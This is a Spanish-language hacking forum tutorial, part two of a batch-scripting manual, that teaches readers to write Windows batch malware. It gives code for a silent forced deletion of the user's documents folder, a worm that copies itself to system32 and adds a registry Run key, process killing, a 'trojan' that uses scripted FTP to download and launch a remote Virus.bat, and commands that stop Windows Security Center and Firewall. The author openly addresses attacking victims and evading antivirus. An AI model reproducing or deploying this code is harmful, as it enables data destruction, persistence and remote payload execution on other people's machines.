PARTE DEDICADA AL MALWARE!
Hola compañeros foreros, este tutorial esta dedicado principalmente a HxC I-H, MH y Cuh (en donde soy Gaara_18) entre otra comunidades en donde ando, recordarque esta es la segunda parte del Manual Batch (Nivel Medio) By 2Fac3R/RocKeG, y esta parte esta dedicada a los Malwares, esta será la parte mas extensa del manual asi que preparence, los temas que veremos aquí serán, Bucle, Virus, Worms, ProcessKiller, AvKiller y Troyanos, también mencionar que no me hago responsable de el mal uso del que le den a esta información, únicamente lo hago con el fin de que aprendan a hacer sus programas en Batch, sin mas hire por el orden mencionado asi que manos a la obra!!!:
Ya había mencionado lo de los Bucles, y se los había dejado a su búsqueda, ahora veremos varias formas de hacer un Bucle, vamos a un ejemplo sencillo de un Bucle infinito:
Código:
@echo off
:inicio
Start [url=http://www.hackxcrack.es]www.hackxcrack.es[/url]
Goto :inicio
Exit
Código:
@echo off
:inicio
Start /min [url=http://www.hackxcrack.es]www.hackxcrack.es[/url]
Start/min [url=http://www.masters-hackers.info]www.masters-hackers.info[/url]
Start/min [url=http://www.foro.el-hacker.com]www.foro.el-hacker.com[/url]
Start/min [url=http://www.i-hacker.info]www.i-hacker.info[/url]
Start
Goto:inicio
exit
-Mmm… con “Del”?-
Exacto! Entonces vamos a codear, bien ¿Qué queremos que haga nuestro Virus?, mmm… pues empezare con un simple virus que destruya todos los archivos de la carpeta “Mis documentos”, para ello es necesario conocer las variables de entorno para este caso vamos a usar una que llevamos usando.
Citar
–Ahh ya sé! %homepath%-
Exacto!, vamos al code.
Código:
@echo off
Del %homepath%\Mis documentos\*.*
Exit
Antes decirte que este code para ser Virus pues no nos funcionaria porque pide confirmación para que elimine los archivos y lógicamente la victima no lo ejecutara, entonces para que nos funcione vamos a usar algo mas reforzado, usaremos el comando “attrib” y los parámetros de “del”, vamos a cmd y tecleamos “del /?” (sin comillas) y veamos que nos sale…:
Código:
Elimina uno o mas archivos.
DEL [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres
ERASE [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres
nombres Especifica una lista de uno o m s archivos o directorios.
Se puede utilizar comodines para eliminar varios archivos.
Si se especifica un directorio todos sus archivos se eliminar n.
/P Pide confirmaci¢n antes de eliminar cada archivo.
/F Fuerza la eliminaci¢n de archivos de s¢lo lectura.
/S Elimina archivos especificados en todos los subdirectorios.
/Q Modo silencioso. No pide confirmaci¢n con comod¡n global
/A Selecciona los archivos que se van a eliminar bas ndose en los
atributos
atributos R Archivos de s¢lo lectura S Archivos de sistema
H Archivos ocultos A Archivos preparados para
almacenamiento
- Prefijo de exclusi¢n
Si las extensiones de comando est n activadas DEL y ERASE cambian de la siguiente manera:
La sem ntica que se muestra para el modificador /S est invertida de tal modo
que le muestra solamente los archivos eliminados y no los que no se encontraron.
Analicemos los parámetros, nos dice que el parámetro “/f” fuerza la eliminación del archivo, pues vamos a usarlo, usaremos también el “/s” para que elimine en todos los subdirectorios y usaremos “/q” para que sea ‘Silencioso’.
-¿Entonces como quedaría el code?-
Pues el code quedaría asi:
Código:
@echo off
Attrib –r –a – s –h “%homepath%\Mis documentos\*.*
Del /p /q /s “%homepath%\Mis documentos\*.*
Exit
Citar
Ohh crei que se te había olvidado lo del comando Attrib que mencionaste que usaríamos pero ahora veo que no -
Pues ya ves que no :p, entonces ese seria el code, no lo ejecuten en su maquina a menos que tengan una maquina virtual para este tipo de pruebas, si eres mas avanzado quizás pienses:Citar
-Que le pasa a este man, porque no usa for y se deja de escribir tanto código-
Claro!, creo que tienes algo de razón pero como he dicho a lo largo de estos manuales que lo dejare a tu búsqueda, pero no te preocupes va a llegar algún momento en donde explique el comando, todo a su tiempo :p. Antes de continuar lo dejo a su imaginación ‘que borran’ con su pequeño virus en Batch, recuerden que sabiendo como funka una pc podrán borrar ciertos archivos y dejarla inservible (para algunas victimas, otras no son tan tontas y pueden recuperarse bajo este tipo de ‘ataques’, pero pues son menos que las que no ) , bien sigamos con lo que nos interesa, ahora les mencionare ‘como’ hacer un worm, ya habíamos hecho uno en el primer manual, pero era muy simple para que nos interesara al 100, pues ahora voy a suponer que tienes tu “virus” y lo quieres propagar (o saber como se propaga con Batch ) , lo que vamos a hacer con nuestro virus es copiarlo a la carpeta “system32” y agregarlo al registro para que se inicie con Windows ?, quizá esto te suene a Chino, pero es aquí donde se va a alargar este tuto, voy a explicar el uso del registro (brevemente, ya sabes, si quieres algo mas complejo busca por Google|Altavista|Yahoo o el que desees), también explicare el uso del For Citar
-Por fin!!!, el famoso for!-
Y varias cosillas mas, bueno primero les mostrare el code e ire explicándolo:Código:
@echo off
REG ADD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VIRUS.bat /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
Copy %0 %windir%\system32
Exit
Código:
@echo off
Tskill 1716
Exit
-
Citar
Como pero asi de fácil?-
Claro esto es muy fácil, lo único que tienes que hacer es poner el nombre del proceso a eliminar.¿Pero como le hago si quiero eliminar otro proceso?, explicame otro ejemplo para tenerlo mas claro, además no entendí porque ese numero -
Bien, te explicare otro, abre la calculadora del Windows.
Inicio --> Todos los programas --> accesorios --> calculadora
Ahora ve al cmd (inicio --> ejecutar --> cmd ? enter) y teclea “tasklist”
Te ha salido una lista de los procesos que se están ejecutando en este momento, pues busca ahora el de la calculadora, Deberias haber encontrado un proceso llamado “calc.exe” con un pid de 544, pues adivina… Ese es el nombre que vamos a poner después de tskill, vamos al code:
Código:
@echo off
Tskill 544
Exit
Y ejecutalo, recuerda que no deberías de haber cerrado manualmente la calculadora antes, osea tiene que estar activa en el momento de que la ejecutes . Si eres un poco curioso te habras dado cuenta de que no has podido cerrar el proceso del AV, pues eso es algo mas complejo, para poderlo cerra primero debes saber que servicios lo están ‘Protegiendo’ pero ese tema se sale de esto asi que lo dejare a tu búsqueda, para que busques específicamente de tu AV :p, entonces buscado esto sabras como hacer un AVKiller, que es un programa en el que primero se quitan los procesos del AV y después elimina por completo de donde se instalo, busca y busca seguro encontraras .Pero por si no encuentras en la próxima parte prometo poner un buen code de AVKiller ? si es que veo que hay gente que lo hace xD, Lo que sigue para mi es lo mejor, ya sabran los de HxC me ha pegado eso de poner lo mejor al final xD, asi que iremos a lo mejor que es el Troyano, en este caso lo voy a hacer con el comando Ftp (que seguro ya sabes lo del FTP porque te haz leído las revistas básicamente combonare varias cosas que hemos estado viendo en este manual.
VAMOS A CREAR UN TROYANO EN BATCH!!!
Bien empezare por explicarles el code que es este:
Código:
@echo off
Echo USER>Troj.tmp
Echo PASWORD>>Trojan.tmp
Echo get Virus.bat>>Trojan.tmp
Echo bye>>trojan.tmp
Echo quit>>trojan.tmp
Start –s:Trojan.tmp Servidor de FTP
Del /f /s /q Trojan.tmp
Start/min Virus.bat
Copy % %windir%\system32
Exit
No recuerda que no soy adivino xD. Bien ahora tecleamos nuestro servidor ftp, en mi caso es Anime online , aprovecho para invitarlos a mi web. Ok sin mas vamos a la practica tecleamos “open www.elanime.do.am” (recuerda que debes sustituir por el nombre de tu servidor de ftp) y nos saldrá esto:
Ahora debemos poner el nombre de nuestro usuario y contraseña, y nos saldrá esto:
Bien ahora estamos adentro de nuestro servidor ftp, vamos a hacer algo, subiremos y descargaremos archivos. Vamos al put , get y “dir”,
-Pero que has dicho? “Dir” es un comando del batch no?-
Claro veo que has estudiado por tu cuenta, recuerda que este manual es solo un pequeño “amigo” para aprender cosas que en otros manuales no he visto , bien sin mas vamos al ejemplo, vamos a hacer un dir. Vamos teclea “dir”
El dir nos listara los archivos que tenemos en nuestro ftp, y vemos varios archivo voy a bajar en especifico 1 y subiré un archivo de “prueba.txt”, basta de teoría y vamos al ejemplo:
Como ven si le damos enter nos descargara el archivo mencionado, que es “libro3.jpeg” que en este caso es una imagen del 3er libro del Avatar xD (el libro fuego),
Este es el resultado que tienes que tener, ahora vamos a ver si nos la ha descargado en realidad:
xD disculpen que este tan distorsionada pero era para que se entendiera el ejemplo xD, sigamos, ahora vamos a subir un archivo, vamos a la cmd de nuevo, y tecleamos “put prueba.txt” (recuerda que yo subiré este archivo que esta en %homepath%
-¿Por qué ahí?-
Pues si te haz fijado en la primera imagen, al iniciar la cmd me aparece esa ruta por defecto, pondré la imagen nuevamente :
Vemos, que nos aparece en donde dije, esto puede varias depende de la configuración de la pc, asi que no te asusten ni pienses que no te funcionara si no tienes esta ruta , bien vamos a continuar.
Bien, se supone que haz intentado teclear “put prueba.txt” que en mi caso tiene que estar en %homepath% osea en la carpeta del usuario (si no entiendes esto del %homepath% leete las partes anteriores del manual).
Vamos a la imagen para que vean que funciona
Bien funciono, ahora vamos a hacer un dir para verificar que este ahí .
Aquí estamos viendo el archivo “prueba.txt” (a la derechar) subido correctamente y lo demás que esta subrayado son los informe del archivo subido, ok ya entendido todo esto sabemos como funciona el servidor FTP y hemos hecho una prueba de subir y bajar archivos. Ahora vamos a transformarlo a batch y no solo en cmd, vamos a nuestro code de ejemplo el cual sube el prueba.txt y baja “libro3.jpeg”.
Código:
@echo off
Echo USUARIO>trojan.tmp
Echo PASSWORD>>trojan.tmp
Echo put prueba.txt>>trojan.tmp
Echo get libro3.jpeg>>trojan.tmp
Echo bye>>trojan.tmp
Echo exit>>trojan.tmp
ftp-s:trojan.tmp [url=http://www.elanime.do.am]www.elanime.do.am[/url]
exit
Código:
@echo off
Net Stop “Centro de Seguridad”
Net Stop “Firewall de Windows/Conexión compartida a Internet (ICS)”
Exit
Entonces lo dejo a su imaginación, recuerden lo que hemos visto en esta parte, worm, virus, bucles, AvKiller, etc. Y si le hechan imaginación seguro podras sacar sin problemas al firewall y al AV para poder meter nuestro pequeño “amiguito” (supongo que sabes a que me refiero no . Sin mas esta es la ultima parte “Publica” por el momento ya que unire varias partes y mejorare el manual para dejarlo en uno solo y participar en el concurso de HxC, asi que por el momento seria todo, apréndanse bien todo porque cuando regrese, regresare mas que nuca, además anticiparles que quizá haga en un futuro un manual de HTML con mi estilo de ‘Explicar’ las cosas .
Les recuerdo que pueden hacer con este manual lo que se les ocurra y se les antoje, menos decir que ustedes lo hicieron xD, recuerden mencionar el Autor del Manual (Gaara_18|2Fac3R|RocKeG), sin mas decirles que este manual fue hecho específicamente para HxC y I-H! pero en las otras comunidades donde ando también lo posteare para que me critiquen (no muy gacho por favor xD).
Me despido
2Fac3R
PDF:
DESCARGAR -->Multiupload.com - upload your files to multiple file hosting sites!
NOTA: EN EL MANUAL menciono IMAGENES NO HE SUBIDO (AUN) LAS IMAGENES SI QUIERES VERTELO POR EL MOMENTO, BAJATE EL PDF QUE VIENE CON LAS IMAGENES ASI QUE PONGANSE A ESTUDIAR.
PD: LAS SIGUIENTES VERSIONES NO SALDRAN ANTES DE QUE TERMINE EL NUEVO CONCURSO DE HXC DE LOS MANUALES, AI SE LEEN LA ULTIMA PARTE VERAN.
ZALU2